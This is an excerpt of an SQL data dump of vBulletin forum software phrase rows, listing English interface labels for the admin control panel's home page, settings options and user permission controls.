(33242, -1, 'view_reminders', 'cphome', 'View Reminders', 'vbulletin', '', 0, ''),
(33243, -1, 'web_server', 'cphome', 'Web Server', 'vbulletin', '', 0, ''),
(33244, -1, 'welcome_to_the_vbulletin_admin_control_panel', 'cphome', 'Welcome to the vBulletin Admin Control Panel', 'vbulletin', '', 0, ''),
(33245, -1, 'welcome_to_the_vbulletin_moderator_control_panel', 'cphome', 'Welcome to the vBulletin Moderator Control Panel', 'vbulletin', '', 0, ''),
(33246, -1, 'x_y_members_z_guests', 'cphome', '{1} ({2} members and {3} guests)', 'vbulletin', '', 0, ''),
(33247, -1, 'you_are_running_vbulletin_version_x', 'cphome', 'You are currently running vBulletin version {1}', 'vbulletin', '', 0, ''),
(33248, -1, 'you_have_x_tasks_due', 'cphome', 'You have {1} tasks now due or overdue', 'vbulletin', '', 0, ''),
(33249, -1, 'your_version_of_vbulletin_is_up_to_date', 'cphome', 'Your version of vBulletin ({1}) is up-to-date.', 'vbulletin', '', 0, ''),
(33250, -1, 'add_new_setting', 'cpoption', 'Add New Setting', 'vbulletin', '', 0, ''),
(33251, -1, 'add_new_setting_group', 'cpoption', 'Add New Setting Group', 'vbulletin', '', 0, ''),
(33252, -1, 'add_setting', 'cpoption', 'Add Setting', 'vbulletin', '', 0, ''),
(33253, -1, 'alignment', 'cpoption', 'Alignment', 'vbulletin', '', 0, ''),
(33254, -1, 'are_you_sure_want_to_delete_setting_x', 'cpoption', 'Are you sure you want to delete the setting: \'{1}\'?', 'vbulletin', '', 0, ''),
(33255, -1, 'are_you_sure_want_to_delete_settinggroup_x', 'cpoption', 'Are you sure you want to delete the setting group: \'{1}\'?', 'vbulletin', '', 0, ''),
(33256, -1, 'backup', 'cpoption', 'Backup', 'vbulletin', 'vBulletin Solutions', 1145051991, '3.6.0 Beta 1'),
(33257, -1, 'backup_restore_settings', 'cpoption', 'Backup / Restore Settings', 'vbulletin', 'vBulletin Solutions', 1145043559, '3.6.0 Beta 1'),
(33258, -1, 'basic', 'cpoption', 'Basic', 'vbulletin', '', 0, ''),
(33259, -1, 'blacklist', 'cpoption', 'Blacklist', 'vbulletin', 'vBulletin Solutions', 1148678112, '3.6.0 Beta 1'),
(33260, -1, 'blank', 'cpoption', '(blank)', 'vbulletin', '', 0, ''),
(33261, -1, 'collapse_setting_groups', 'cpoption', 'Collapse Setting Groups', 'vbulletin', '', 0, ''),
(33262, -1, 'collapsible', 'cpoption', 'Collapsible', 'vbulletin', '', 0, ''),
(33263, -1, 'contactus', 'cpoption', 'Contact Us', 'vbulletin', 'vBulletin Solutions', 1216635030, '3.8.0 Alpha 1'),
(33264, -1, 'coppa_disabled', 'cpoption', 'Disable COPPA', 'vbulletin', 'vBulletin Solutions', 1144877010, '3.6.0 Beta 1'),
(33265, -1, 'coppa_enabled', 'cpoption', 'Enable COPPA', 'vbulletin', 'vBulletin Solutions', 1144877016, '3.6.0 Beta 1'),
(33266, -1, 'css', 'cpoption', 'CSS', 'vbulletin', '', 0, ''),
(33267, -1, 'custom_setting', 'cpoption', 'Custom Setting', 'vbulletin', '', 0, ''),
(33268, -1, 'database_automatic_forum_marking', 'cpoption', 'Database (automatic forum marking)', 'vbulletin', '', 0, ''),
(33269, -1, 'database_no_automatic_forum_marking', 'cpoption', 'Database (no automatic forum marking)', 'vbulletin', '', 0, ''),
(33270, -1, 'datatype_bitfield', 'cpoption', 'Bitfield', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33271, -1, 'datatype_boolean', 'cpoption', 'Boolean', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33272, -1, 'datatype_free', 'cpoption', 'Free', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33273, -1, 'datatype_integer', 'cpoption', 'Integer', 'vbulletin', 'vBulletin Solutions', 1195215617, '3.7.0 Beta 1'),
(33274, -1, 'datatype_numeric', 'cpoption', 'Numeric', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33275, -1, 'datatype_posint', 'cpoption', 'Positive Integer', 'vbulletin', 'vBulletin Solutions', 1208953886, '3.7.0 Release Candidate 4'),
(33276, -1, 'datatype_username', 'cpoption', 'Username', 'vbulletin', 'vBulletin Solutions', 1145921395, '3.6.0 Beta 1'),
(33277, -1, 'deny_under_13_registration', 'cpoption', 'Deny registration for users aged under 13 years', 'vbulletin', '', 0, ''),
(33278, -1, 'detailed', 'cpoption', 'Detailed', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33279, -1, 'detected_gd_version', 'cpoption', 'Detected GD Version', 'vbulletin', '', 0, ''),
(33280, -1, 'disable_all_ajax_features', 'cpoption', 'Disable All AJAX Features', 'vbulletin', '', 0, ''),
(33281, -1, 'disable_controls', 'cpoption', 'Disable Controls', 'vbulletin', '', 0, ''),
(33282, -1, 'disable_problematic_ajax_features', 'cpoption', 'Disable Problematic AJAX Features', 'vbulletin', '', 0, ''),
(33283, -1, 'disable_scanning', 'cpoption', 'Disable Scanning', 'vbulletin', 'vBulletin Solutions', 1221045419, '3.8.0 Alpha 1'),
(33284, -1, 'display_age', 'cpoption', 'Display Age', 'vbulletin', '', 0, ''),
(33285, -1, 'display_but_require_admin_or_mod', 'cpoption', 'Display, but require administrator or moderator', 'vbulletin', '', 0, ''),
(33286, -1, 'display_infractions', 'cpoption', 'Display Infractions', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33287, -1, 'display_publicly', 'cpoption', 'Display publicly', 'vbulletin', '', 0, ''),
(33288, -1, 'display_reputation_power', 'cpoption', 'Display Reputation Power', 'vbulletin', '', 0, ''),
(33289, -1, 'do_not_log_ip', 'cpoption', 'Do not log IP', 'vbulletin', '', 0, ''),
(33290, -1, 'download_settings_xml_file', 'cpoption', 'Download Settings XML File', 'vbulletin', '', 0, ''),
(33291, -1, 'download_upload_settings', 'cpoption', 'Download / Upload Settings', 'vbulletin', '', 0, ''),
(33292, -1, 'edit_settings', 'cpoption', 'Edit Settings', 'vbulletin', '', 0, ''),
(33293, -1, 'email_moderators', 'cpoption', 'Email Moderators', 'vbulletin', 'vBulletin Solutions', 1149539350, '3.6.0 Beta 1'),
(33294, -1, 'email_moderators_and_administrators', 'cpoption', 'Email Moderators, Super Moderators, and Administrators', 'vbulletin', 'vBulletin Solutions', 1149539380, '3.6.0 Beta 1'),
(33295, -1, 'empty_postindex_and_word', 'cpoption', 'Empty postindex and word tables?This can also be done from the Maintenance section later. ', 'vbulletin', '', 0, ''),
(33296, -1, 'enable_albums', 'cpoption', 'Albums', 'vbulletin', 'vBulletin Solutions', 1194956682, '3.7.0 Beta 1'),
(33297, -1, 'enable_all_ajax_features', 'cpoption', 'Enable All AJAX Features', 'vbulletin', '', 0, ''),
(33298, -1, 'enable_friends', 'cpoption', 'Friends', 'vbulletin', 'vBulletin Solutions', 1194956699, '3.7.0 Beta 1'),
(33299, -1, 'enable_groups', 'cpoption', 'Social Groups', 'vbulletin', 'vBulletin Solutions', 1194956664, '3.7.0 Beta 1'),
(33300, -1, 'enable_profile_styling', 'cpoption', 'Profile Styling', 'vbulletin', 'vBulletin Solutions', 1195740393, '3.7.0 Beta 1'),
(33301, -1, 'enable_standard_and_wysiwyg_controls', 'cpoption', 'Enable Standard & WYSIWYG Controls ', 'vbulletin', 'vBulletin Solutions', 1161596695, '3.6.3'),
(33302, -1, 'enable_standard_controls', 'cpoption', 'Enable Standard Controls', 'vbulletin', '', 0, ''),
(33303, -1, 'enable_visitor_tracking', 'cpoption', 'Visitor Tracking', 'vbulletin', 'vBulletin Solutions', 1194956717, '3.7.0 Beta 1'),
(33304, -1, 'error_confirmation_phrase', 'cpoption', 'There are errors in the settings on this page.\\n\r\n\\n\r\nAre you sure you want to save the settings?', 'vbulletin', 'vBulletin Solutions', 1149699342, '3.6.0 Beta 1'),
(33305, -1, 'expand_setting_groups', 'cpoption', 'Expand Setting Groups', 'vbulletin', '', 0, ''),
(33306, -1, 'expanded', 'cpoption', 'Expanded', 'vbulletin', '', 0, ''),
(33307, -1, 'full_editor', 'cpoption', 'Full Editor', 'vbulletin', '', 0, ''),
(33308, -1, 'gd_simple_font', 'cpoption', 'GD (Simple Font)', 'vbulletin', 'vBulletin Solutions', 1153773989, '3.6.0 Release Candidate 3'),
(33309, -1, 'gd_ttf_font', 'cpoption', 'GD (True Type Font)', 'vbulletin', 'vBulletin Solutions', 1153841933, '3.6.0 Release Candidate 3'),
(33310, -1, 'group_by_date', 'cpoption', 'Group by Date', 'vbulletin', '', 0, ''),
(33311, -1, 'group_by_event', 'cpoption', 'Group by Event', 'vbulletin', '', 0, ''),
(33312, -1, 'ignore_blacklisted_settings', 'cpoption', 'Ignore Blacklisted settings', 'vbulletin', 'vBulletin Solutions', 1148683561, '3.6.0 Beta 1'),
(33313, -1, 'imagemagick_error', 'cpoption', 'ImageMagick Error', 'vbulletin', '', 0, ''),
(33314, -1, 'import_settings_xml_file', 'cpoption', 'Import Settings XML File', 'vbulletin', '', 0, ''),
(33315, -1, 'importing_settings', 'cpoption', 'Importing Settings', 'vbulletin', '', 0, ''),
(33316, -1, 'inactivity_cookie_based', 'cpoption', 'Inactivity/Cookie Based', 'vbulletin', '', 0, ''),
(33317, -1, 'instant_message_icons', 'cpoption', 'Instant Message Icons', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33318, -1, 'language_specific_skypeweb_graphics', 'cpoption', 'Use Language-Specific SkypeWeb Graphics', 'vbulletin', '', 0, ''),
(33319, -1, 'links', 'cpoption', 'Links', 'vbulletin', '', 0, ''),
(33320, -1, 'live_permission_check', 'cpoption', 'Live Permission Check', 'vbulletin', 'vBulletin Solutions', 1209744605, '3.7.1'),
(33321, -1, 'lostpw', 'cpoption', 'Recover Lost Password', 'vbulletin', 'vBulletin Solutions', 1216635171, '3.8.0 Alpha 1'),
(33322, -1, 'no_email', 'cpoption', 'No Email', 'vbulletin', 'vBulletin Solutions', 1149539335, '3.6.0 Beta 1'),
(33323, -1, 'no_permission_check', 'cpoption', 'No Permission Check', 'vbulletin', 'vBulletin Solutions', 1209744612, '3.7.1'),
(33324, -1, 'normal', 'cpoption', 'Normal', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33325, -1, 'not_specified_questions_no_validation', 'cpoption', 'You have not specified any questions. No validation will happen until a question is added.', 'vbulletin', 'vBulletin Solutions', 1197980380, '3.7.0 Beta 3'),
(33326, -1, 'only_one_per_post', 'cpoption', 'Yes, if post has only one attachment', 'vbulletin', '', 0, ''),
(33327, -1, 'option_code', 'cpoption', 'Option Code (blank, yesno, textarea, or custom eval code) ', 'vbulletin', '', 0, ''),
(33328, -1, 'qr_click_not_required', 'cpoption', 'Click Not Required', 'vbulletin', '', 0, ''),
(33329, -1, 'qr_click_required', 'cpoption', 'Click Required', 'vbulletin', '', 0, ''),
(33330, -1, 'question_verification', 'cpoption', 'Question & Answer Verification', 'vbulletin', 'vBulletin Solutions', 1192141474, '3.7.0 Beta 1'),
(33331, -1, 'quick_edit', 'cpoption', 'Quick Edit', 'vbulletin', '', 0, ''),
(33332, -1, 'quick_reply', 'cpoption', 'Quick Reply', 'vbulletin', '', 0, ''),
(33333, -1, 'random_color', 'cpoption', 'Random Color', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33334, -1, 'random_font', 'cpoption', 'Random Font', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33335, -1, 'random_fontsize', 'cpoption', 'Random Font Size', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33336, -1, 'random_shape', 'cpoption', 'Random Shapes', 'vbulletin', 'vBulletin Solutions', 1161208915, '3.6.3'),
(33337, -1, 'random_slant', 'cpoption', 'Random Slant', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33338, -1, 'recaptcha', 'cpoption', 'reCAPTCHA™', 'vbulletin', 'vBulletin Solutions', 1205930064, '3.7.0 Release Candidate 1'),
(33339, -1, 'recaptcha_blackglass', 'cpoption', 'Black Glass', 'vbulletin', 'vBulletin Solutions', 1192644235, '3.7.0 Beta 1'),
(33340, -1, 'recaptcha_clean', 'cpoption', 'Clean', 'vbulletin', 'vBulletin Solutions', 1212065186, '3.7.2'),
(33341, -1, 'recaptcha_red', 'cpoption', 'Red', 'vbulletin', 'vBulletin Solutions', 1192644218, '3.7.0 Beta 1'),
(33342, -1, 'recaptcha_verification_options', 'cpoption', 'reCAPTCHA™ Verification Options', 'vbulletin', 'vBulletin Solutions', 1205930070, '3.7.0 Release Candidate 1'),
(33343, -1, 'recaptcha_white', 'cpoption', 'White', 'vbulletin', 'vBulletin Solutions', 1192644226, '3.7.0 Beta 1'),
(33344, -1, 'register', 'cpoption', 'Register', 'vbulletin', 'vBulletin Solutions', 1216635205, '3.8.0 Alpha 1'),
(33345, -1, 'remove_fulltext_indices', 'cpoption', 'Remove Fulltext Indexes', 'vbulletin', 'vBulletin Solutions', 1197976790, '3.7.0 Beta 3'),
(33346, -1, 'require_birthday', 'cpoption', 'Require Birthday', 'vbulletin', '', 0, ''),
(33347, -1, 'restore', 'cpoption', 'Restore', 'vbulletin', 'vBulletin Solutions', 1145051983, '3.6.0 Beta 1'),
(33348, -1, 'restore_settings_xml_file', 'cpoption', 'Restore Settings XML File', 'vbulletin', 'vBulletin Solutions', 1145052019, '3.6.0 Beta 1'),
(33349, -1, 'restore_xml_file', 'cpoption', 'OR restore the XML file from your server', 'vbulletin', 'vBulletin Solutions', 1145052064, '3.6.0 Beta 1'),
(33350, -1, 'save_settings', 'cpoption', 'Save Settings', 'vbulletin', '', 0, ''),
(33351, -1, 'setting', 'cpoption', 'Setting', 'vbulletin', '', 0, ''),
(33352, -1, 'settings_bitfield_error', 'cpoption', 'An error occurred while processing the bitfield files, the following information was returned: {1}', 'vbulletin', 'vBulletin Solutions', 1157553628, '3.6.1'),
(33353, -1, 'show_all_settings', 'cpoption', 'Show All Settings', 'vbulletin', '', 0, ''),
(33354, -1, 'show_birthdays_active_users_only', 'cpoption', 'Show birthdays for active users only', 'vbulletin', '', 0, ''),
(33355, -1, 'show_total_number_active_members', 'cpoption', 'Show total number of active members', 'vbulletin', '', 0, ''),
(33356, -1, 'single', 'cpoption', 'Single', 'vbulletin', '', 0, ''),
(33357, -1, 'specify_magick_path_above', 'cpoption', 'Please specify a valid ImageMagick path above.', 'vbulletin', '', 0, ''),
(33358, -1, 'suggested_settings', 'cpoption', 'Suggested Settings', 'vbulletin', '', 0, ''),
(33359, -1, 'use_custom_setting', 'cpoption', 'Use Custom Setting (Specify Below)', 'vbulletin', '', 0, ''),
(33360, -1, 'validation_php_code', 'cpoption', 'Validation PHP Code', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33361, -1, 'yes_alphabetical_all', 'cpoption', 'Yes, Alphabetical listing to all visitors', 'vbulletin', 'vBulletin Solutions', 1145485044, '3.6.0 Beta 1'),
(33362, -1, 'yes_alphabetical_members', 'cpoption', 'Yes, Alphabetical listing to members only', 'vbulletin', 'vBulletin Solutions', 1145484984, '3.6.0 Beta 1'),
(33363, -1, 'yes_but_disable_moderators', 'cpoption', 'Yes, but Disable Moderators', 'vbulletin', '', 0, ''),
(33364, -1, 'yes_but_verify_image', 'cpoption', 'Yes, but Verify Image', 'vbulletin', '', 0, ''),
(33365, -1, 'yes_click', 'cpoption', 'Yes, Click', 'vbulletin', 'vBulletin Solutions', 1194968757, '3.7.0 Beta 1'),
(33366, -1, 'yes_click_or_hover', 'cpoption', 'Yes, Click or Hover', 'vbulletin', 'vBulletin Solutions', 1199971880, '3.7.0 Beta 4'),
(33367, -1, 'yes_display_post_counts', 'cpoption', 'Yes - Display Post Counts', 'vbulletin', '', 0, ''),
(33368, -1, 'yes_hide_post_counts', 'cpoption', 'Yes - Hide Post Counts', 'vbulletin', '', 0, ''),
(33369, -1, 'yes_hover', 'cpoption', 'Yes, Hover', 'vbulletin', 'vBulletin Solutions', 1194968769, '3.7.0 Beta 1'),
(33370, -1, 'yes_plain_text_version', 'cpoption', 'Yes, plain text version', 'vbulletin', 'vBulletin Solutions', 1190112940, '3.7.0 Beta 1'),
(33371, -1, 'yes_random_all', 'cpoption', 'Yes, Random listing to all visitors', 'vbulletin', 'vBulletin Solutions', 1145485055, '3.6.0 Beta 1'),
(33372, -1, 'yes_random_members', 'cpoption', 'Yes, Random listing to members only', 'vbulletin', 'vBulletin Solutions', 1145485005, '3.6.0 Beta 1'),
(33373, -1, 'yes_rich_text_version', 'cpoption', 'Yes, rich text version', 'vbulletin', 'vBulletin Solutions', 1190112947, '3.7.0 Beta 1'),
(33374, -1, 'yes_with_border', 'cpoption', 'Yes, with border', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33375, -1, 'yes_with_border_and_dimensions', 'cpoption', 'Yes, with border and dimensions', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33376, -1, 'yes_with_dimensions', 'cpoption', 'Yes, with dimensions', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33377, -1, 'yes_with_locking', 'cpoption', 'Yes, with locking', 'vbulletin', '', 0, ''),
(33378, -1, 'yesterday_today', 'cpoption', 'Yesterday / Today', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33379, -1, 'your_forum_is_currently_using_default_search', 'cpoption', 'Your forum is currently using the vBulletin search engine.\r\n \r\nTo enable the MySQL Fulltext search, we will issue the following two queries. If for some reason this process is unsuccessful, you will need to perform these queries manually. Please be patient as this can take from 10 seconds to an hour depending on the number of posts on your forum.\r\n \r\nALTER TABLE {1}post ADD FULLTEXT INDEX (title,pagetext) \r\nALTER TABLE {1}thread ADD FULLTEXT INDEX (title) \r\n{2}\r\n{3}', 'vbulletin', '', 0, ''),
(33380, -1, 'your_forum_is_currently_using_fulltext_search', 'cpoption', 'Your forum is currently using the Fulltext search engine.\r\n \r\nIf you wish to revert to the vBulletin search engine, please continue. You can leave the Fulltext indexes in place if you expect to return to the Fulltext search in the near future. Leaving them in place will cause added load on your system in the interim.', 'vbulletin', 'vBulletin Solutions', 1197976810, '3.7.0 Beta 3'),
(33381, -1, 'your_post_and_thread_table_will_be_converted', 'cpoption', 'Your post and thread table will be converted to the MyISAM type in order to support Fulltext searching. ', 'vbulletin', '', 0, ''),
(33382, -1, 'additional_functions', 'cppermission', 'Additional Functions', 'vbulletin', '', 0, ''),
(33383, -1, 'administrator', 'cppermission', 'Administrator', 'vbulletin', '', 0, ''),
(33384, -1, 'administrator_permissions_manager', 'cppermission', 'Administrator Permissions Manager', 'vbulletin', '', 0, ''),
(33385, -1, 'album_max_pictures', 'cppermission', 'Maximum Number of Album Pictures', 'vbulletin', 'vBulletin Solutions', 1191938709, '3.7.0 Beta 1'),
(33386, -1, 'album_max_size', 'cppermission', 'Maximum Total File Size of Album Pictures (bytes)\r\n1KB = 1024 bytes ', 'vbulletin', 'vBulletin Solutions', 1191938732, '3.7.0 Beta 1'),
(33387, -1, 'album_picture_max_height', 'cppermission', 'Album Picture Maximum Height (pixels)', 'vbulletin', 'vBulletin Solutions', 1191938644, '3.7.0 Beta 1'),
(33388, -1, 'album_picture_max_size', 'cppermission', 'Album Picture Maximum File Size (bytes)\r\n1KB = 1024 bytes ', 'vbulletin', 'vBulletin Solutions', 1191938670, '3.7.0 Beta 1'),
(33389, -1, 'album_picture_max_width', 'cppermission', 'Album Picture Maximum Width (pixels)', 'vbulletin', 'vBulletin Solutions', 1191938637, '3.7.0 Beta 1'),
(33390, -1, 'allow_bbcode_align', 'cppermission', 'Allow Alignment BB Code ', 'vbulletin', 'vBulletin Solutions', 1205493460, '3.7.0 Release Candidate 1'),
(33391, -1, 'allow_bbcode_basic', 'cppermission', 'Allow Basic BB Code ', 'vbulletin', 'vBulletin Solutions', 1205493460, '3.7.0 Release Candidate 1'),
(33392, -1, 'allow_bbcode_code', 'cppermission', 'Allow Code BB Code ', 'vbulletin', 'vBulletin Solutions', 1205493460, '3.7.0 Release Candidate 1'),
(33393, -1, 'allow_bbcode_color', 'cppermission', 'Allow Color BB Code ', 'vbulletin', 'vBulletin Solutions', 1205493460, '3.7.0 Release Candidate 1'),
(33394, -1, 'allow_bbcode_custom', 'cppermission', 'Allow Custom BB Codes ', 'vbulletin', 'vBulletin Solutions', 1203946020, '3.7.0 Beta 6'),
(33395, -1, 'allow_bbcode_font', 'cppermission', 'Allow Font BB Code ', 'vbulletin', 'vBulletin Solutions', 1205493460, '3.7.0 Release Candidate 1'),
(33396, -1, 'allow_bbcode_html', 'cppermission', 'Allow HTML BB Code ', 'vbulletin', 'vBulletin Solutions', 1205493460, '3.7.0 Release Candidate 1'),
(33397, -1, 'allow_bbcode_img', 'cppermission', 'Allow Image BB Code ', 'vbulletin', 'vBulletin Solutions', 1203945993, '3.7.0 Beta 6'),
(33398, -1, 'allow_bbcode_link', 'cppermission', 'Allow Link BB Code ', 'vbulletin', 'vBulletin Solutions', 1205493460, '3.7.0 Release Candidate 1'),
(33399, -1, 'allow_bbcode_list', 'cppermission', 'Allow List BB Code ', 'vbulletin', 'vBulletin Solutions', 1205493460, '3.7.0 Release Candidate 1'),
(33400, -1, 'allow_bbcode_php', 'cppermission', 'Allow PHP BB Code ', 'vbulletin', 'vBulletin Solutions', 1205493460, '3.7.0 Release Candidate 1'),
(33401, -1, 'allow_bbcode_quote', 'cppermission', 'Allow Quote BB Code ', 'vbulletin', 'vBulletin Solutions', 1205493460, '3.7.0 Release Candidate 1'),
(33402, -1, 'allow_bbcode_size', 'cppermission', 'Allow Size BB Code ', 'vbulletin', 'vBulletin Solutions', 1205493460, '3.7.0 Release Candidate 1'),
(33403, -1, 'allow_member_groups', 'cppermission', 'Allow Users to have Member Groups (Sets whether or not permissions from the user\'s member (secondary) user group memberships are inherited or not) ', 'vbulletin', '', 0, ''),
(33404, -1, 'apply_permissions_to_forum', 'cppermission', 'Apply Permissions to Forum (Includes Sub-Forums) ', 'vbulletin', '', 0, ''),
(33405, -1, 'apply_permissions_to_usergroup', 'cppermission', 'Apply Permissions to Usergroups', 'vbulletin', '', 0, ''),
(33406, -1, 'attachment_permissions', 'cppermission', 'Attachment Permissions', 'vbulletin', '', 0, ''),
(33407, -1, 'birthdays_viewable', 'cppermission', 'Birthdays Viewable (Sets whether or not the birthdays of users in this group are displayed on the calendar and forum home pages) ', 'vbulletin', '', 0, ''),
(33408, -1, 'calendar_permissions', 'cppermission', 'Calendar Permissions', 'vbulletin', '', 0, ''),
(33409, -1, 'calendar_permissions_manager', 'cppermission', 'Calendar Permissions Manager', 'vbulletin', '', 0, ''),
(33410, -1, 'can_access_control_panel', 'cppermission', 'Can Access Control Panel (is Administrator)', 'vbulletin', '', 0, ''),
(33411, -1, 'can_administer_bbcodes', 'cppermission', 'Can Administer BB Codes', 'vbulletin', '', 0, ''),
(33412, -1, 'can_administer_calendars', 'cppermission', 'Can Administer Calendars', 'vbulletin', '', 0, ''),
(33413, -1, 'can_administer_cron', 'cppermission', 'Can Administer CRON', 'vbulletin', '', 0, ''),
(33414, -1, 'can_administer_faq', 'cppermission', 'Can Administer FAQs', 'vbulletin', '', 0, ''),
(33415, -1, 'can_administer_forums', 'cppermission', 'Can Administer Forums', 'vbulletin', '', 0, ''),
(33416, -1, 'can_administer_images', 'cppermission', 'Can Administer Avatars / Icons / Smilies', 'vbulletin', '', 0, ''),
(33417, -1, 'can_administer_languages', 'cppermission', 'Can Administer Languages', 'vbulletin', '', 0, ''),
(33418, -1, 'can_administer_moderator_log', 'cppermission', 'Can Administer Moderator Log', 'vbulletin', 'vBulletin Solutions', 1207570472, '3.7.0 Release Candidate 3'),
(33419, -1, 'can_administer_notices', 'cppermission', 'Can Administer Notices', 'vbulletin', 'vBulletin Solutions', 1207568406, '3.7.0 Release Candidate 3'),
(33420, -1, 'can_administer_plugins', 'cppermission', 'Can Administer Plugins', 'vbulletin', '', 0, ''),
(33421, -1, 'can_administer_settings', 'cppermission', 'Can Administer Settings', 'vbulletin', '', 0, ''),
(33422, -1, 'can_administer_styles', 'cppermission', 'Can Administer Styles', 'vbulletin', '', 0, ''),
(33423, -1, 'can_administer_threads', 'cppermission', 'Can Administer Threads', 'vbulletin', '', 0, ''),
(33424, -1, 'can_administer_user_permissions', 'cppermission', 'Can Administer User Permissions', 'vbulletin', '', 0, ''),
(33425, -1, 'can_administer_users', 'cppermission', 'Can Administer Users', 'vbulletin', '', 0, ''),
(33426, -1, 'can_always_create_discussion', 'cppermission', 'Can Always Create Discussions\r\nIf enabled, the user will also be able to view private and invite only groups. ', 'vbulletin', 'vBulletin Solutions', 1223643954, '3.8.0 Beta 1'),
(33427, -1, 'can_always_post_message', 'cppermission', 'Can Always Post Messages\r\nIf enabled, the user will also be able to view private and invite only groups. ', 'vbulletin', 'vBulletin Solutions', 1223643982, '3.8.0 Beta 1'),
(33428, -1, 'can_ban_users', 'cppermission', 'Can Ban Users', 'vbulletin', '', 0, ''),
(33429, -1, 'can_comment_pictures', 'cppermission', 'Can Comment on Pictures', 'vbulletin', 'vBulletin Solutions', 1198152711, '3.7.0 Beta 1'),
(33430, -1, 'can_create_discussion', 'cppermission', 'Can Create New Discussions in Groups', 'vbulletin', 'vBulletin Solutions', 1210937696, '3.7.1'),
(33431, -1, 'can_create_social_groups', 'cppermission', 'Can Create Social Groups', 'vbulletin', 'vBulletin Solutions', 1193766976, '3.7.0 Beta 1'),
(33432, -1, 'can_create_tags', 'cppermission', 'Can Create Tags', 'vbulletin', 'vBulletin Solutions', 1190817335, '3.7.0 Beta 1'),
(33433, -1, 'can_delete_discussions', 'cppermission', 'Can Delete Discussions', 'vbulletin', 'vBulletin Solutions', 1211464580, '3.7.1'),
(33434, -1, 'can_delete_events', 'cppermission', 'Can Delete Events', 'vbulletin', '', 0, ''),
(33435, -1, 'can_delete_own_events', 'cppermission', 'Can Delete Own Events', 'vbulletin', '', 0, ''),
(33436, -1, 'can_delete_own_picture_comments', 'cppermission', 'Can Delete Own Picture Comments', 'vbulletin', 'vBulletin Solutions', 1198152729, '3.7.0 Beta 1'),
(33437, -1, 'can_delete_own_posts', 'cppermission', 'Can Delete Own Posts', 'vbulletin', '', 0, ''),
(33438, -1, 'can_delete_own_social_groups', 'cppermission', 'Can Delete Own Social Groups', 'vbulletin', 'vBulletin Solutions', 1193766983, '3.7.0 Beta 1'),
(33439, -1, 'can_delete_own_threads', 'cppermission', 'Can Delete Own Threads', 'vbulletin', '', 0, ''),
(33440, -1, 'can_delete_own_visitor_messages', 'cppermission', 'Can Delete Own Visitor Messages', 'vbulletin', 'vBulletin Solutions', 1197370769, '3.7.0 Beta 1'),
(33441, -1, 'can_delete_picture_comments', 'cppermission', 'Can Delete Picture Comments', 'vbulletin', 'vBulletin Solutions', 1198169784, '3.7.0 Beta 1'),
(33442, -1, 'can_delete_posts', 'cppermission', 'Can Delete Posts', 'vbulletin', '', 0, ''),
(33443, -1, 'can_delete_social_groups', 'cppermission', 'Can Delete Social Groups', 'vbulletin', 'vBulletin Solutions', 1192546375, '3.7.0 Beta 1'),
(33444, -1, 'can_delete_tags_own_threads', 'cppermission', 'Can Delete Tags on Own Threads', 'vbulletin', 'vBulletin Solutions', 1190301015, '3.7.0 Beta 1'),
(33445, -1, 'can_deny_pm_receipt', 'cppermission', 'Can Deny Private Message Read Receipt Request', 'vbulletin', '', 0, ''),
(33446, -1, 'can_download_attachments', 'cppermission', 'Can Download Attachments', 'vbulletin', '', 0, ''),
(33447, -1, 'can_edit_background_image', 'cppermission', 'Can Edit Background Images\r\nUsers must have user album permissions as well ', 'vbulletin', 'vBulletin Solutions', 1193400770, '3.7.0 Beta 1'),
(33448, -1, 'can_edit_borders', 'cppermission', 'Can Edit Borders\r\nCovers border style, color, and width ', 'vbulletin', 'vBulletin Solutions', 1193400794, '3.7.0 Beta 1'),
(33449, -1, 'can_edit_colors', 'cppermission', 'Can Edit Colors\r\nCovers font and background colors ', 'vbulletin', 'vBulletin Solutions', 1193400739, '3.7.0 Beta 1'),
(33450, -1, 'can_edit_discussions', 'cppermission', 'Can Edit Discussions', 'vbulletin', 'vBulletin Solutions', 1211464555, '3.7.1'),
(33451, -1, 'can_edit_events', 'cppermission', 'Can Edit Events', 'vbulletin', '', 0, ''),
(33452, -1, 'can_edit_font_family', 'cppermission', 'Can Edit Font Family', 'vbulletin', 'vBulletin Solutions', 1193400699, '3.7.0 Beta 1'),
(33453, -1, 'can_edit_font_size', 'cppermission', 'Can Edit Font Size', 'vbulletin', 'vBulletin Solutions', 1193400712, '3.7.0 Beta 1'),
(33454, -1, 'can_edit_own_events', 'cppermission', 'Can Edit Own Events', 'vbulletin', '', 0, ''),
(33455, -1, 'can_edit_own_picture_comments', 'cppermission', 'Can Edit Own Picture Comments', 'vbulletin', 'vBulletin Solutions', 1198152722, '3.7.0 Beta 1'),
(33456, -1, 'can_edit_own_posts', 'cppermission', 'Can Edit Own Posts', 'vbulletin', '', 0, ''),
(33457, -1, 'can_edit_own_profile', 'cppermission', 'Can Edit Own Profile', 'vbulletin', '', 0, ''),
(33458, -1, 'can_edit_own_social_groups', 'cppermission', 'Can Edit Own Social Groups\r\nIf the only member of the group is the owner, he/she will be able to edit the group\'s info regardless of this setting. ', 'vbulletin', 'vBulletin Solutions', 1211885031, '3.7.1'),
